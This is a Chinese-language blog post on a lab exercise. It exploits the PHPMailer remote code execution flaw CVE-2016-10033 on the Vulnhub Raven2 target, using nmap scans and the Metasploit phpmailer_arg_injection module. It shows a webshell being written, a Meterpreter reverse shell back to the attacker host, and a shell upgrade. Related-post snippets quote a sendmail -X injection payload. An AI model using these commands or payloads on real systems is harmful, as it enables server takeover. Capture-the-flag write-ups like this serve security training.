PHPMailer远程代码执行漏洞复现2:原理详解+MSF法渗透实战(CVE-2016-10033 Raven2靶机)

原创 于 2025-10-27 16:30:11 发布 · 731 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CVE-2016-10033 #PHPMailer代码执行漏洞 #PHPMailer漏洞 #Metasploit

目录

一、PHPMailer远程代码执行漏洞

二、环境搭建

三、漏洞探测

1、探测端口与服务

2、探测漏洞脚本

3、查找Flag

4、发现PHPMailer

四、PHPMailer远程代码执行漏洞

1、MSF搜索PHPMailer漏洞

2、phpmailer_arg_injection

3、配置MSF

4、MSF执行run

5、访问contact.php生成V6TkeSuG.php

6、访问V6TkeSuG.php反弹shell

7、Kali监听成功,建立反弹shell连接

8、查找flag文件

9、查看flag2

10、查找flag3

本文通过Kali攻击机对Vulnhub的Raven2靶机进行渗透测试,发现并利用PHPMailer 5.2.16版本的远程代码执行漏洞(CVE-2016-10033)。通过MSF法渗透成功在目标服务器上生成Webshell并获取反弹Shell。测试过程中发现目标系统存在目录遍历漏洞并获取首个flag。利用Metasploit框架配置PHPMailer漏洞利用模块,最终在/var/www/目录下找到flag2.txt,并在WordPress上传目录中发现flag3.png图片。

一、PHPMailer远程代码执行漏洞

PHPMailer远程代码执行漏洞(以CVE-2016-10033为例)源于其对用户输入的邮箱地址验证与转义处理存在逻辑缺陷。攻击者可构造包含特殊字符的恶意邮箱地址,绕过过滤机制将参数注入到Sendmail命令行中,并利用其-X日志参数将包含PHP代码的邮件内容写入Web可访问目录,从而在服务器上创建恶意Webshell,最终实现远程代码执行,完全控制目标系统。

特点类别具体描述
漏洞类型远程代码执行 (RCE)
触发方式命令注入 + 功能滥用(利用Sendmail日志功能写文件)
利用条件1. 目标使用PHPMailer (< 5.2.18)
2. 存在联系人等邮件发送表单
3. Web目录路径已知且可写
4. 使用mail()函数(而非SMTP)发送
攻击载体精心构造的邮箱地址字段(from/email参数)
技术核心验证与转义顺序不当:先验证邮箱格式(RFC允许引号内特殊字符)后转义导致注入参数逃逸。
利用链恶意邮箱地址 -> 注入Sendmail的-X参数 -> 将邮件内容写入Web目录 -> 生成Webshell
隐蔽性较高。攻击 payload 隐藏在合法的邮箱字段中,不易被常规WAF规则检测。
影响范围广泛,因PHPMailer被集成于WordPress, Drupal, Joomla!, Yii等众多主流PHP应用和框架中。
漏洞等级高危 (High/Critical),可导致服务器被完全接管。
修复方式升级PHPMailer版本(>=5.2.18)

二、环境搭建

本文使用Kali作为攻击机,kali-linux(IP:192.168.59.128/24)如下所示。

靶机使用vulnhub的Raven2虚拟机环境,下载完成后解压到电脑,然后使用VMware直接打开并选择开机效果如下图所示:

下载地址:(vulnhub)https://downloads.sourceforge.net/project/raven2-ctf/Raven2.ova

使用工具查看存活网段,如下所示由于攻击机kali为192.168.59.128,本机(Windows主机)为192.168.59.1,故而靶机的IP地址为192.168.59.136。

三、漏洞探测

1、探测端口与服务

在Kali的终端使用nmap对靶机进行端口扫描,以最快速度、尽可能隐蔽地扫描目标IP的所有65535个TCP端口,并尝试识别所有开放端口上运行的服务版本、操作系统类型,同时运行默认的脚本扫描进行更深入的探测

nmap -sS -sV -T5 -A -p- 192.168.59.136

  • -sS (SYN Stealth Scan): 半开放扫描。这是nmap默认的扫描方式。它发送一个SYN包,如果收到SYN/ACK回复,就判断端口开放,然后发送RST包终止连接,而不完成完整的TCP三次握手。这种方式速度快且不易被日志记录。

  • -sV (Version Detection): 版本探测。nmap会尝试与开放的端口建立连接,并探测其上运行的服务和应用程序的具体版本号。这是信息收集中非常关键的一步。

  • -T5 (Timing Template): 定时模板-T 参数控制扫描速度(0-5),-T5 是最快的“疯狂”模式。它会以最快速度发送数据包,牺牲了一定的隐蔽性和准确性来换取速度。在网络条件好、不担心触发安全设备的情况下使用。

  • -A (Aggressive Scan): 全面扫描。这是一个“全能”选项,相当于同时开启了 -sV (版本探测)、-O (操作系统探测)、--script=default (默认NSE脚本扫描) 和 --traceroute (路由追踪)。它旨在一次性获取大量目标信息。

  • -p- (Port Specification): 扫描所有端口-p- 告诉nmap扫描从1到65535的所有TCP端口,而不仅仅是默认的1000个常用端口。

如下所示,发现靶机开放了4个端口,包括80、22等端口,突破口有可能在80端口的Web应用上。

    2、探测漏洞脚本

    使用Nmap的漏洞脚本库对目标进行了初步的漏洞探测,调用Nmap脚本引擎(NSE)中所有分类为“vuln”的脚本,对目标进行扫描检测已知的漏洞。命令如下所示。

    nmap --script=vuln 192.168.59.136

    发现有目录枚举漏洞(http-enum),具体如下所示。

    • /wordpress/发现了WordPress站点! 这是一个重大突破。WordPress本身、其主题和插件历史上存在大量漏洞,是渗透测试中最常见的突破口。
    • /wordpress/wp-login.php: 确认了WordPress的登录页面。这是暴力破解和尝试弱口令的直接入口。
    • 目录列表漏洞/css//img//js//vendor/ 等目录都开启了目录浏览(Directory Listing)。这意味着访问这些URL(如 http://192.168.59.136/css/)可以直接看到目录下的文件列表,无需索引页(如index.html)。这可能会泄露敏感文件(如备份文件、配置文件、源代码)

    3、查找Flag

    访问vendor目录遍历漏洞的页面,具体如下所示。

    http://192.168.59.136/vendor/

    点击PATH链接地址,如下所示。

    此时进入到vendor/path页面,获取到第一个flag,如下所示。

    http://192.168.59.136/vendor/PATH

    4、发现PHPMailer

    访问Readme.md发现PHPMailer版本,具体如下所示。

    查看vendor目录下的Readme文件,获取到当前Web框架为PHPMailer,且版本号为5.2。

    http://192.168.59.136/vendor/README.md

    查看vendor目录下的version文件,获取到PHPMailer版本号为5.2.16。

    http://192.168.59.136/vendor/VERSION

    四、PHPMailer远程代码执行漏洞

    1、MSF搜索PHPMailer漏洞

    在MSF中搜索phpmailer,查找到2个漏洞,其中序号为0的CVE-2016-12-26即为需要利用的渗透脚本。

    msfconsole
search phpmailer

    2、phpmailer_arg_injection

    选择exploit/multi/http/phpmailer_arg_injection,显示配置选项,如下所示。

    use 0
show options

    3、配置MSF

    使用Metasploit命令配置了针对PHPMailer漏洞(CVE-2016-10033)的自动化攻击流程。它指定目标主机192.168.59.136及其漏洞页面contact.php,并设置Web根目录为/var/www/html以确保恶意Webshell能正确写入。执行后,模块会自动构造特殊请求注入sendmail参数,将包含Payload的邮件内容写入指定路径,最终建立反向Shell连接,从而获得对目标服务器的远程控制权限。

    set rhosts 192.168.59.136
set TARGETURI /contact.php
set WEB_ROOT /var/www/html

    4、MSF执行run

    msf执行run开启攻击,此时执行contact.php会在根目录下生成了木马V6TkeSuG.php,如下所示。

    5、访问contact.php生成V6TkeSuG.php

    浏览器访问192.168.59.136/contact.php,此时时间会稍长,运行结果如下所示。

    192.168.59.136/contact.php

    6、访问V6TkeSuG.php反弹shell

    浏览器访问V6TkeSuG.php与Kali攻击机的4444端口建立连接,如下所示。

    7、Kali监听成功,建立反弹shell连接

    如下所示kali监听成功,攻击机反弹shell建立成功。输入python -c 'import pty;pty.spawn("/bin/bash")'后,在获取了一个简陋的Shell之后,将其升级为一个功能完整的交互式Shell。同时输入getuid获取当前用户如下所示,当前用户为www-data低权限用户。

    msf6 exploit(multi/http/phpmailer_arg_injection) > run

[*] Started reverse TCP handler on 192.168.59.128:4444 
[*] Writing the backdoor to /var/www/html/V6TkeSuG.php
[*] Sleeping before requesting the payload from: /contact.php/V6TkeSuG.php
[*] Waiting for up to 300 seconds to trigger the payload
[*] Sending stage (39282 bytes) to 192.168.59.136
[+] Deleted /var/www/html/V6TkeSuG.php
[*] Meterpreter session 1 opened (192.168.59.128:4444 -> 192.168.59.136:40552 ) at 2025-09-02 10:17:16 -0400


meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter >

    输入shell进入bash页面,尝试输入ls查看当前目录,运行结果如下所示。

    8、查找flag文件

    输入find / -name flag*查找flag相关的文件,在渗透测试中,find 命令会遍历所有目录,但低权限用户(如 www-data)会遇到大量 Permission denied 错误,这些错误信息会刷屏,干扰你寻找真正的结果。将所有的错误信息(包括 Permission denied)重定向到“空设备”(/dev/null),从而只显示成功找到的结果,命令如下所示。

    find / -name flag* 2>/dev/null

    发现两个flag相关文件,分别是flag2和flag3相关,具体路径如下所示。

    /var/www/flag2.txt
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

    9、查看flag2

    flag2的文件路径为/var/www/flag2.txt,执行cat /var/www/flag.txt查看,具体如下所示。

    10、查找flag3

    flag3的文件路径:/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png,通过网站URL访问flag3.png图片,如下所示。

    http://192.168.59.136//wordpress/wp-content/uploads/2018/11/flag3.png

    CVE-2016-10033PHPMailer 远程代码执行漏洞
    weixin_45253622的博客
    06-23 2346
    漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2
    PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
    谢公子的博客
    04-05 2379
    PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
    WordPress4.6命令执行漏洞CVE-2016-10033复现教程---保姆级教程
    爱吃仡坨的Blog
    09-11 4586
    WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
    Web安全 -- CVE-2016-10033漏洞
    redBu1l的博客
    12-10 4302
    引言CVE-2016-10033漏洞背景独立研究人员Dawid Golunski发现该漏洞远程攻击者利用该漏洞,可实现远程任意代码在web服务器上执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反悔表单、注册表单中 ,邮件密码重置表单等使用发送的组建时利用此漏洞漏洞影响的版本PHPMailer < 5.2.18环境搭建模拟如图网络环境web服务器配置web服务器的系统为cent
    wordpress 4.6 RCE漏洞利用(CVE-2016-10033
    xiaobai_20190815的博客
    04-08 5813
    一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
    【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1
    AAAAAAAAAAAA66的博客
    01-04 2415
    中华人民共和国网络安全(出版物)_360百科中华人民共和国网络安全,《中华人民共和国网络安全》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、人和其他组织的合权益,促进经济社会信息化健康发展而制定的律。《中华人民共和国网络安全》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题
    CVE漏洞复现-CVE-2016-10033-远程命令执行
    把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
    04-28 2415
    PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。:小于 5.2.18 版本。
    漏洞复现 wordpress 远程代码执行CVE-2016-10033
    weixin_48900801的博客
    07-25 1746
    漏洞复现 wordpress 远程代码执行CVE-2016-10033) 名称: WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
    WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
    SoulCat
    02-08 4992
    WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞版本: WordPress &lt;= 4.6.0 PH...
    php5.2漏洞,PHPMailer < 5.2.18 远程代码执行CVE-2016-10033漏洞分析
    weixin_31188927的博客
    03-11 903
    Author: p0wd3r, dawu (知道创宇404安全实验室)Date: 2016-12-270x00 漏洞概述1.漏洞简介Dawid Golunski 在圣诞节当天发布了一个漏洞报告,报告中表明 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞。成功利用该漏洞后,攻击者可以远程任意代码执行。许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件,影响不可...
    PHPMailer 命令执行漏洞CVE-2016-10033)分析
    浮生若梦的专栏
    01-01 9563
    PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。 CVE-2016-10033PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。 对比一下新老版本: https://github
    php100漏洞,【漏洞分析】CVE-2016-10033PHPMailer远程代码执行漏洞的分析
    weixin_36312271的博客
    03-11 436
    预估稿费:70RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿0x00前言PHP是一种开源的脚本语言,被用来嵌入HTML做Web开发。它有9百万用户,并且被许多流行的工具使用,例如WordPress、Drupal、Joomla!等。这周一个高危安全更新用来解决PHPMailer远程代码执行漏洞CVE-2016-10033。它是PHP网站发送邮件的...
    Vulfocus-WordPress远程命令执行(CVE-2016-10033)
    qq_52178795的博客
    06-11 1175
    漏洞名称:WordPress远程命令执行(CVE-2016-10033)漏洞描述:WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。当WordPress 使用 PHPMailer 组件向用户发送邮件。
    PHPMailer远程命令执行漏洞溯源
    2303_76679642的博客
    08-29 765
    步骤3:burp抓包,更改email处payload为"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com 更改message处payload为<?PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)步骤1:进入靶场,利用bp抓包,发现与后台交互的文件。步骤2:进入之后看到下面的页面,很明显是一个功能点。
    php查看邮件漏洞,PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
    weixin_42327291的博客
    03-11 558
    原标题:PHPMailer任意文件读取漏洞分析(CVE-2017-5223)PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目...
    docker复习:CVE-2016-10033验证
    zh的博客
    10-22 684
    复习目的:回顾docker命令、了解漏洞利用过程 准备:docker虚拟机、exp脚本、kali 漏洞描述: WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构...
    墨者学院-PHPMailer远程命令执行漏洞溯源
    qq_47094508的博客
    07-01 1024
    拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
    WordPress远程命令执行
    harker_20的博客
    11-15 1214
    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.youkuaiyun.com/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包

    打赏作者

    mooyuan天天

    你的鼓励将是我创作的最大动力

    ¥1 ¥2 ¥4 ¥6 ¥10 ¥20
    扫码支付:¥1
    获取中
    扫码支付

    您的余额不足,请更换扫码支付或充值

    打赏作者

    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值